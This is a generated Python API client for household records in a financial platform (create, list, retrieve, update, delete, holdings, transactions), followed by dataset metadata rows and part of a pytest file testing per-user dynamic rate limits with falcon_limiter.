def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_household_using_post(self, household, **kwargs): # noqa: E501
"""Create a Household # noqa: E501
Create a new household, with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_household_using_post(household, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Household household: household (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_household_using_post_with_http_info(household, **kwargs) # noqa: E501
else:
(data) = self.create_household_using_post_with_http_info(household, **kwargs) # noqa: E501
return data
def create_household_using_post_with_http_info(self, household, **kwargs): # noqa: E501
"""Create a Household # noqa: E501
Create a new household, with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_household_using_post_with_http_info(household, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Household household: household (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_household_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household' is set
if self.api_client.client_side_validation and ('household' not in params or
params['household'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household` when calling `create_household_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'household' in params:
body_params = params['household']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Household', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_household_using_delete(self, household_id, **kwargs): # noqa: E501
"""Delete a Household # noqa: E501
Permanently delete a household # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_household_using_delete(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_household_using_delete_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.delete_household_using_delete_with_http_info(household_id, **kwargs) # noqa: E501
return data
def delete_household_using_delete_with_http_info(self, household_id, **kwargs): # noqa: E501
"""Delete a Household # noqa: E501
Permanently delete a household # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_household_using_delete_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_household_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `delete_household_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_all_using_get(self, **kwargs): # noqa: E501
"""List all household # noqa: E501
Get details for all Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageHousehold
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_household_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_household_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all household # noqa: E501
Get details for all Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageHousehold
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageHousehold', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_client_asset_size_using_get(self, household_id, **kwargs): # noqa: E501
"""List all household client asset sizes # noqa: E501
Get a list of asset sizes per date for a client's household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_asset_size_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in ()
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_client_asset_size_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_client_asset_size_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_client_asset_size_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""List all household client asset sizes # noqa: E501
Get a list of asset sizes per date for a client's household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_asset_size_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in ()
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id', 'currency_conversion', 'end_date', 'exclude_subledger', 'get_latest', 'sort_type', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_client_asset_size_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_client_asset_size_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'exclude_subledger' in params:
query_params.append(('exclude_subledger', params['exclude_subledger'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'sort_type' in params:
query_params.append(('sort_type', params['sort_type'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}/asset_size', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[AvailableDateDoubleVO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_client_holding_using_get(self, household_id, **kwargs): # noqa: E501
"""List all household's clientIds holdings # noqa: E501
Get the information for all the securities that are currently being held by a household's client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_holding_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date - yyyy-mm-dd
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date - yyyy-mm-dd
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_client_holding_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_client_holding_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_client_holding_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""List all household's clientIds holdings # noqa: E501
Get the information for all the securities that are currently being held by a household's client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_holding_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date - yyyy-mm-dd
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date - yyyy-mm-dd
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'get_latest', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_client_holding_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_client_holding_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}/holding', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagePortfolioHoldingAgg', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_client_transaction_using_get(self, household_id, **kwargs): # noqa: E501
"""List all household's client ids transactions # noqa: E501
Get the information for all transactions under a household client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_transaction_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_client_transaction_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_client_transaction_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_client_transaction_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""List all household's client ids transactions # noqa: E501
Get the information for all transactions under a household client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_transaction_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_client_transaction_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_client_transaction_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}/transaction', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagePortfolioTransaction', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_using_get(self, household_id, **kwargs): # noqa: E501
"""Retrieve a Household # noqa: E501
Retrieve the information for a Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""Retrieve a Household # noqa: E501
Retrieve the information for a Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Household', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_household_using_put(self, household, household_id, **kwargs): # noqa: E501
"""Update a Household # noqa: E501
Update the information for a Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_household_using_put(household, household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object household: household (required)
:param str household_id: UUID household_id (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_household_using_put_with_http_info(household, household_id, **kwargs) # noqa: E501
else:
(data) = self.update_household_using_put_with_http_info(household, household_id, **kwargs) # noqa: E501
return data
def update_household_using_put_with_http_info(self, household, household_id, **kwargs): # noqa: E501
"""Update a Household # noqa: E501
Update the information for a Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_household_using_put_with_http_info(household, household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object household: household (required)
:param str household_id: UUID household_id (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household', 'household_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_household_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household' is set
if self.api_client.client_side_validation and ('household' not in params or
params['household'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household` when calling `update_household_using_put`") # noqa: E501
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `update_household_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'household' in params:
body_params = params['household']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Household', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.71694
| 165
| 0.620299
| 4,547
| 39,086
| 5.061579
| 0.047504
| 0.052488
| 0.028069
| 0.025027
| 0.962807
| 0.956289
| 0.950641
| 0.94156
| 0.934086
| 0.931132
| 0
| 0.017227
| 0.290104
| 39,086
| 914
| 166
| 42.763676
| 0.812232
| 0.332856
| 0
| 0.818557
| 1
| 0
| 0.20341
| 0.059001
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035052
| false
| 0
| 0.008247
| 0
| 0.094845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8c99aed4e87cbbf98b94b88aa1643f7b1efba5aa
| 7,220
|
py
|
Python
|
tests/async_tests/test_dynamic_limits.py
|
zoltan-fedor/falcon-limits
|
e145c8b6cb9567fa1df1bbc4430c673bb0a34f48
|
[
"MIT"
] | 1
|
2020-10-10T14:48:37.000Z
|
2020-10-10T14:48:37.000Z
|
tests/async_tests/test_dynamic_limits.py
|
zoltan-fedor/falcon-limits
|
e145c8b6cb9567fa1df1bbc4430c673bb0a34f48
|
[
"MIT"
] | null | null | null |
tests/async_tests/test_dynamic_limits.py
|
zoltan-fedor/falcon-limits
|
e145c8b6cb9567fa1df1bbc4430c673bb0a34f48
|
[
"MIT"
] | null | null | null |
""" Testing the dynamic_limits option
"""
from falcon import asgi, testing, HTTP_200, HTTP_429, HTTP_500
from falcon_limiter import AsyncLimiter
from falcon_limiter.utils import get_remote_addr
from time import sleep
def test_default_dynamic_limits():
""" Test using the default_dynamic_limits option to change the limit per user
"""
limiter = AsyncLimiter(
key_func=get_remote_addr,
default_dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
if req.get_header('APIUSER') == 'admin' else '2/second'
)
@limiter.limit()
class ThingsResource:
async def on_get(self, req, resp):
resp.body = 'Hello world!'
app = asgi.App(middleware=limiter.middleware)
app.add_route('/things', ThingsResource())
client = testing.TestClient(app)
####
# 'normal' user - errors after more than 2 calls per sec
r = client.simulate_get('/things')
assert r.status == HTTP_200
r = client.simulate_get('/things')
assert r.status == HTTP_200
# due to the 2/second limit
r = client.simulate_get('/things')
assert r.status == HTTP_429
#########
# 'admin' user should be able to make 5 calls
admin_header = {"APIUSER": "admin"}
for i in range(5):
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
# at the 6th hit even the admin user will error:
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_429
sleep(1)
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
def test_dynamic_limits_on_method():
""" Test using the dynamic_limits param of the method decorators to change the limit per user
"""
limiter = AsyncLimiter(
key_func=get_remote_addr,
default_limits=["10 per hour", "1 per second"]
)
class ThingsResource:
@limiter.limit(dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
if req.get_header('APIUSER') == 'admin' else '2/second')
async def on_get(self, req, resp):
resp.body = 'Hello world!'
async def on_post(self, req, resp):
resp.body = 'Hello world!'
app = asgi.App(middleware=limiter.middleware)
app.add_route('/things', ThingsResource())
client = testing.TestClient(app)
####
# 'normal' user - errors after more than 2 calls per sec
r = client.simulate_get('/things')
assert r.status == HTTP_200
r = client.simulate_get('/things')
assert r.status == HTTP_200
# due to the 2/second limit
r = client.simulate_get('/things')
assert r.status == HTTP_429
#########
# 'admin' user should be able to make 5 calls
admin_header = {"APIUSER": "admin"}
for i in range(5):
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
# at the 6th hit even the admin user will error:
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_429
sleep(1)
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
########
# unlimited number of calls to the unlimited on_post() method
for i in range(8):
r = client.simulate_post('/things')
assert r.status == HTTP_200
def test_dynamic_limits_on_method2():
""" Test using the dynamic_limits param of the method decorators to change the limit per user
Overwriting the default limits from the method level decorator
"""
limiter = AsyncLimiter(
key_func=get_remote_addr,
default_limits=["10 per hour", "1 per second"]
)
@limiter.limit(dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
if req.get_header('APIUSER') == 'admin' else '2/second')
class ThingsResource:
@limiter.limit()
async def on_get(self, req, resp):
resp.body = 'Hello world!'
async def on_post(self, req, resp):
resp.body = 'Hello world!'
app = asgi.App(middleware=limiter.middleware)
app.add_route('/things', ThingsResource())
client = testing.TestClient(app)
####
# 'normal' user - errors after more than 2 calls per sec
r = client.simulate_get('/things')
assert r.status == HTTP_200
r = client.simulate_get('/things')
assert r.status == HTTP_200
# due to the 2/second limit
r = client.simulate_get('/things')
assert r.status == HTTP_429
#########
# 'admin' user should be able to make 5 calls
admin_header = {"APIUSER": "admin"}
for i in range(5):
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
# at the 6th hit even the admin user will error:
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_429
sleep(1)
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
def test_dynamic_limits_on_class():
""" Test using the dynamic_limits param of the decorators to change the limit per user
"""
limiter = AsyncLimiter(
key_func=get_remote_addr,
default_limits=["10 per hour", "1 per second"]
)
class ThingsResource:
@limiter.limit(dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
if req.get_header('APIUSER') == 'admin' else '2/second')
async def on_get(self, req, resp):
resp.body = 'Hello world!'
@limiter.limit(limits="3/second")
async def on_post(self, req, resp):
resp.body = 'Hello world!'
app = asgi.App(middleware=limiter.middleware)
app.add_route('/things', ThingsResource())
client = testing.TestClient(app)
####
# 'normal' user - errors after more than 2 calls per sec
r = client.simulate_get('/things')
assert r.status == HTTP_200
r = client.simulate_get('/things')
assert r.status == HTTP_200
# due to the 2/second limit
r = client.simulate_get('/things')
assert r.status == HTTP_429
#########
# 'admin' user should be able to make 5 calls
admin_header = {"APIUSER": "admin"}
for i in range(5):
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
# at the 6th hit even the admin user will error:
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_429
sleep(1)
r = client.simulate_get('/things', headers=admin_header)
assert r.status == HTTP_200
########
# the on_post() method has a limit of 3/second - for normal users
for i in range(3):
r = client.simulate_post('/things')
assert r.status == HTTP_200
r = client.simulate_post('/things')
assert r.status == HTTP_429
########
# the on_post() method has a limit of 3/second - for admin users too
sleep(1)
for i in range(3):
r = client.simulate_post('/things', headers=admin_header)
assert r.status == HTTP_200
r = client.simulate_post('/things', headers=admin_header)
assert r.status == HTTP_429
| 30.987124
| 97
| 0.639335
| 984
| 7,220
| 4.542683
| 0.10874
| 0.045414
| 0.097315
| 0.110291
| 0.89821
